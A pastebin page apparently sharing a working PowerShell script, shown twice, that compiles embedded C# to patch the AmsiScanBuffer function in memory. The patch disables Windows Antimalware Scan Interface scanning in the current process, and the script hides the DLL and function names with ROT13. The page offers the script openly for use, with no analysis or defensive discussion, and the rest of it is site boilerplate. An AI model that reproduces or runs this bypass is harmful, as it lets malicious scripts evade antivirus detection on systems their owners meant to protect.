Untitled

From [email protected], 1 Month ago, written in Plain Text.

Embed

Download Paste or View Raw
Hits: 1904

$code = @"

using System;

using System.Diagnostics;

using System.Runtime.InteropServices;

namespace game {

public class Program {

static byte[] patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };

static IntPtr addr = GetFunctionAddr(Transform("nzfv.qyy"), Transform("NzfvFpnaOhssre"));

public static void Main(string[] args) { // thanks: https://rastamouse.me/memory-patching-amsi-bypass/

uint oldProtect = 0;

VirtualProtect(addr, (IntPtr)patch.Length, 0x40, ref oldProtect);

Marshal.Copy(patch, 0, (IntPtr)addr, patch.Length);

}

static IntPtr GetFunctionAddr(string module, string function) { // function name is case sensitive

LoadLibrary(module);

var modules = Process.GetCurrentProcess().Modules;

var hMod = IntPtr.Zero;

foreach (ProcessModule pModule in modules) {

if (pModule.ModuleName.ToLower().Equals(module.ToLower())) {

hMod = pModule.BaseAddress;

break;

}

}

var FunctionAddr = GetProcAddress(hMod, function);

return FunctionAddr;

}

public static string Transform(string value) {

char[] array = value.ToCharArray();

for (int i = 0; i < array.Length; i++) {

int number = (int)array[i];

if (number >= 'a' && number <= 'z') {

if (number > 'm') {

number -= 13;

}

else {

number += 13;

}

}

else if (number >= 'A' && number <= 'Z') {

if (number > 'M') {

number -= 13;

}

else {

number += 13;

}

}

array[i] = (char)number;

}

return new string(array);

}

[DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]

static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)] string lpFileName);

[DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]

static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

[DllImport("kernel32.dll")]

static extern bool VirtualProtect(IntPtr intptr_0, IntPtr intptr_1, uint uint_0, ref uint uint_1);

}

}

"@

Add-Type -TypeDefinition $code -Language CSharp

iex "[game.Program]::Main('')"

Author

Title

Language

Your paste - Paste your paste here

$code = @&quot;
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace game {
    public class Program {
        
        static byte[] patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
        static IntPtr addr = GetFunctionAddr(Transform(&quot;nzfv.qyy&quot;), Transform(&quot;NzfvFpnaOhssre&quot;));
        public static void Main(string[] args) { // thanks: https://rastamouse.me/memory-patching-amsi-bypass/
            uint oldProtect = 0;
            VirtualProtect(addr, (IntPtr)patch.Length, 0x40, ref oldProtect);
            Marshal.Copy(patch, 0, (IntPtr)addr, patch.Length);

}
        static IntPtr GetFunctionAddr(string module, string function) { // function name is case sensitive
            LoadLibrary(module);
            var modules = Process.GetCurrentProcess().Modules;
            var hMod = IntPtr.Zero;

foreach (ProcessModule pModule in modules) {
                if (pModule.ModuleName.ToLower().Equals(module.ToLower())) {
                    hMod = pModule.BaseAddress;
                    break;
                }
            }
            var FunctionAddr = GetProcAddress(hMod, function);
            return FunctionAddr;

}
        public static string Transform(string value) {
            char[] array = value.ToCharArray();
            for (int i = 0; i &lt; array.Length; i++) {
                int number = (int)array[i];

if (number &gt;= 'a' &amp;&amp; number &lt;= 'z') {
                    if (number &gt; 'm') {
                        number -= 13;
                    }
                    else {
                        number += 13;
                    }
                }
                else if (number &gt;= 'A' &amp;&amp; number &lt;= 'Z') {
                    if (number &gt; 'M') {
                        number -= 13;
                    }
                    else {
                        number += 13;
                    }
                }
                array[i] = (char)number;
            }
            return new string(array);
        }
        [DllImport(&quot;kernel32&quot;, SetLastError = true, CharSet = CharSet.Ansi)]
        static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)] string lpFileName);
        [DllImport(&quot;kernel32&quot;, CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
        static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
        [DllImport(&quot;kernel32.dll&quot;)]
        static extern bool VirtualProtect(IntPtr intptr_0, IntPtr intptr_1, uint uint_0, ref uint uint_1);
    }
}
&quot;@
Add-Type -TypeDefinition $code -Language CSharp 
iex &quot;[game.Program]::Main('')&quot;

Private - Private paste aren't shown in recent listings.

Delete After - When should we delete your paste?

Spam protection -

{"html5":"htmlmixed","css":"css","javascript":"javascript","php":"php","python":"python","ruby":"ruby","lua":"text\/x-lua","bash":"text\/x-sh","go":"go","c":"text\/x-csrc","cpp":"text\/x-c++src","diff":"diff","latex":"stex","sql":"sql","xml":"xml","apl":"apl","asterisk":"asterisk","c_loadrunner":"text\/x-csrc","c_mac":"text\/x-csrc","coffeescript":"text\/x-coffeescript","csharp":"text\/x-csharp","d":"d","ecmascript":"javascript","erlang":"erlang","groovy":"text\/x-groovy","haskell":"text\/x-haskell","haxe":"text\/x-haxe","html4strict":"htmlmixed","java":"text\/x-java","java5":"text\/x-java","jquery":"javascript","mirc":"mirc","mysql":"sql","ocaml":"text\/x-ocaml","pascal":"text\/x-pascal","perl":"perl","perl6":"perl","plsql":"sql","properties":"text\/x-properties","q":"text\/x-q","scala":"scala","scheme":"text\/x-scheme","tcl":"text\/x-tcl","vb":"text\/x-vb","verilog":"text\/x-verilog","yaml":"text\/x-yaml","z80":"text\/x-z80"}

Reply to "Untitled"